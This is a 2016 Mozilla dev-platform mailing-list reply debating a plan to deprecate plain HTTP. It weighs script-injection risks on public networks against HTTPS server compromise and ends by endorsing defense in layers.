Steve Fink wrote: > On 12/20/2016 06:20 PM, Edmund Wong wrote: >> Richard Barnes wrote: >> >>> Broadly speaking, this plan would entail limiting new features to >>> secure >>> contexts, followed by gradually removing legacy features from insecure >>> contexts. Having an overall program for HTTP deprecation makes a clear >>> statement to the web community that the time for plaintext is over -- it >> There is nothing wrong with plaintext just as long as it isn't something >> credential-like. Also, what you're doing will only make a clear >> statement to the web community that you are forcing something on them >> and limiting THEIR choices of broadcasting their information as they >> see fit. >> >> IOW, "deprecating HTTP" is not a good idea. > > If I have a browser exploit that I can embed in a <script> tag, I can > inject it into all of the HTTP network traffic on my LAN. Not so nice if > visiting an HTTP website at Starbucks or the public library gets you pwned. >
Point taken. Someone could just as well crack into a server that has HTTPS and hijack it to inject HTTPS-enabled browser exploits. Sure, it's not as simple as injecting it in HTTP traffic, but that still could happen. No amount of HTTPS could prevent your system being pwned, which is why defense in layers is the best security. In any event, the choice is Mozilla's. Edmund _______________________________________________ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
